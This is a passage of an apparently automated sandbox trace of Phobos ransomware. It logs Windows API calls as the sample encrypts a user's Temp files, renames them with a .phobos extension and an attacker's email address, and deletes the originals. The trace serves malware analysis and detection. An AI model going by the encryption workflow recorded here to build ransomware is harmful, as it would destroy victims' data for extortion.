lpNumberOfBytesRead=0x2f4fcac*=0xe078, lpOverlapped=0x0) returned 1 [0191.013] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xe080, dwBufLen=0xe080 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xe080) returned 1 [0191.014] WriteFile (in: hFile=0x134, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xe080, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xe080, lpOverlapped=0x0) returned 1 [0191.015] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32ae8) returned 1 [0191.015] CryptSetKeyParam (hKey=0xa32ae8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0191.016] CryptEncrypt (in: hKey=0xa32ae8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0191.016] CryptDestroyKey (hKey=0xa32ae8) returned 1 [0191.016] WriteFile (in: hFile=0x134, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0191.016] CryptDestroyKey (hKey=0xa32d28) returned 1 [0191.016] CloseHandle (hObject=0x194) returned 1 [0191.016] CloseHandle (hObject=0x134) returned 1 [0191.016] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\0U1GwY.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\0u1gwy.jpg")) returned 1 [0191.017] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0191.017] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\CPwwNQ227anynR.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\cpwwnq227anynr.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0191.018] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=71045) returned 1 [0191.018] CloseHandle (hObject=0x134) returned 1 [0191.018] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\CPwwNQ227anynR.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\cpwwnq227anynr.bmp")) returned 0x2020 [0191.018] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\CPwwNQ227anynR.bmp.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\cpwwnq227anynr.bmp.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0191.018] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\CPwwNQ227anynR.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\cpwwnq227anynr.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0191.018] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0191.018] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0191.018] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\CPwwNQ227anynR.bmp.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\cpwwnq227anynr.bmp.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0191.019] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32d28) returned 1 [0191.019] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0191.019] ReadFile (in: hFile=0x134, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x11585, lpOverlapped=0x0) returned 1 [0191.451] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x11590, dwBufLen=0x11590 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x11590) returned 1 [0191.452] WriteFile (in: hFile=0x194, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x11590, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x11590, lpOverlapped=0x0) returned 1 [0191.454] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32ae8) returned 1 [0191.454] CryptSetKeyParam (hKey=0xa32ae8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0191.454] CryptEncrypt (in: hKey=0xa32ae8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x50, dwBufLen=0x50 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x50) returned 1 [0191.454] CryptDestroyKey (hKey=0xa32ae8) returned 1 [0191.454] WriteFile (in: hFile=0x194, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x102, lpOverlapped=0x0) returned 1 [0191.454] CryptDestroyKey (hKey=0xa32d28) returned 1 [0191.454] CloseHandle (hObject=0x134) returned 1 [0191.454] CloseHandle (hObject=0x194) returned 1 [0191.455] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\CPwwNQ227anynR.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\cpwwnq227anynr.bmp")) returned 1 [0191.457] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0191.458] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\eL-dXx 2-UNEbSc.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\el-dxx 2-unebsc.wav"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0191.459] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=37928) returned 1 [0191.459] CloseHandle (hObject=0x194) returned 1 [0191.459] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\eL-dXx 2-UNEbSc.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\el-dxx 2-unebsc.wav")) returned 0x2020 [0191.459] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\eL-dXx 2-UNEbSc.wav.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\el-dxx 2-unebsc.wav.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0191.459] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\eL-dXx 2-UNEbSc.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\el-dxx 2-unebsc.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0191.460] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0191.460] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0191.460] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\eL-dXx 2-UNEbSc.wav.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\el-dxx 2-unebsc.wav.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0191.460] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32d28) returned 1 [0191.460] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0191.460] ReadFile (in: hFile=0x194, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x9428, lpOverlapped=0x0) returned 1 [0191.628] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x9430, dwBufLen=0x9430 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x9430) returned 1 [0191.629] WriteFile (in: hFile=0x134, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x9430, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x9430, lpOverlapped=0x0) returned 1 [0191.630] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32a28) returned 1 [0191.630] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0191.630] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x50, dwBufLen=0x50 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x50) returned 1 [0191.630] CryptDestroyKey (hKey=0xa32a28) returned 1 [0191.630] WriteFile (in: hFile=0x134, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x102, lpOverlapped=0x0) returned 1 [0191.630] CryptDestroyKey (hKey=0xa32d28) returned 1 [0191.630] CloseHandle (hObject=0x194) returned 1 [0191.630] CloseHandle (hObject=0x134) returned 1 [0191.630] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\eL-dXx 2-UNEbSc.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\el-dxx 2-unebsc.wav")) returned 1 [0191.632] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0191.632] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\IDvo5FVdj.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\idvo5fvdj.pdf"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0191.632] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=59931) returned 1 [0191.632] CloseHandle (hObject=0x134) returned 1 [0191.632] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\IDvo5FVdj.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\idvo5fvdj.pdf")) returned 0x2020 [0191.632] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\IDvo5FVdj.pdf.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\idvo5fvdj.pdf.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0191.633] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\IDvo5FVdj.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\idvo5fvdj.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0191.633] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0191.633] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0191.633] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\IDvo5FVdj.pdf.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\idvo5fvdj.pdf.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0191.633] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32d28) returned 1 [0191.633] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0191.633] ReadFile (in: hFile=0x134, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0xea1b, lpOverlapped=0x0) returned 1 [0191.635] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xea20, dwBufLen=0xea20 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xea20) returned 1 [0191.635] WriteFile (in: hFile=0x194, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xea20, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xea20, lpOverlapped=0x0) returned 1 [0191.637] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32a28) returned 1 [0191.637] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0191.637] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0191.637] CryptDestroyKey (hKey=0xa32a28) returned 1 [0191.637] WriteFile (in: hFile=0x194, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0191.637] CryptDestroyKey (hKey=0xa32d28) returned 1 [0191.637] CloseHandle (hObject=0x134) returned 1 [0191.637] CloseHandle (hObject=0x194) returned 1 [0191.637] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\IDvo5FVdj.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\idvo5fvdj.pdf")) returned 1 [0191.638] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0191.638] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\JqoHTaT22.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\jqohtat22.mp3"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0191.639] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=70445) returned 1 [0191.639] CloseHandle (hObject=0x194) returned 1 [0191.639] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\JqoHTaT22.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\jqohtat22.mp3")) returned 0x2020 [0191.639] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\JqoHTaT22.mp3.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\jqohtat22.mp3.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0191.639] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\JqoHTaT22.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\jqohtat22.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0191.639] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0191.639] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0191.639] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\JqoHTaT22.mp3.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\jqohtat22.mp3.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0191.640] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32d28) returned 1 [0191.640] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0191.640] ReadFile (in: hFile=0x194, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x1132d, lpOverlapped=0x0) returned 1 [0191.663] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x11330, dwBufLen=0x11330 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x11330) returned 1 [0191.664] WriteFile (in: hFile=0x134, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x11330, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x11330, lpOverlapped=0x0) returned 1 [0191.666] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa327e8) returned 1 [0191.666] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0191.666] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0191.666] CryptDestroyKey (hKey=0xa327e8) returned 1 [0191.666] WriteFile (in: hFile=0x134, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0191.666] CryptDestroyKey (hKey=0xa32d28) returned 1 [0191.666] CloseHandle (hObject=0x194) returned 1 [0191.666] CloseHandle (hObject=0x134) returned 1 [0191.666] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\JqoHTaT22.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\jqohtat22.mp3")) returned 1 [0191.667] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0191.668] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\kfgRjeDXn8iu.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\kfgrjedxn8iu.wav"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0191.668] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=92219) returned 1 [0191.668] CloseHandle (hObject=0x134) returned 1 [0191.668] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\kfgRjeDXn8iu.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\kfgrjedxn8iu.wav")) returned 0x2020 [0191.668] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\kfgRjeDXn8iu.wav.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\kfgrjedxn8iu.wav.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0191.668] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\kfgRjeDXn8iu.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\kfgrjedxn8iu.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0191.668] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0191.669] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0191.669] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\kfgRjeDXn8iu.wav.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\kfgrjedxn8iu.wav.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0191.669] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32d28) returned 1 [0191.669] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0191.669] ReadFile (in: hFile=0x134, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x1683b, lpOverlapped=0x0) returned 1 [0191.686] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x16840, dwBufLen=0x16840 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x16840) returned 1 [0191.687] WriteFile (in: hFile=0x194, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x16840, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x16840, lpOverlapped=0x0) returned 1 [0191.689] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32a28) returned 1 [0191.689] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0191.689] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x50, dwBufLen=0x50 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x50) returned 1 [0191.689] CryptDestroyKey (hKey=0xa32a28) returned 1 [0191.689] WriteFile (in: hFile=0x194, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x102, 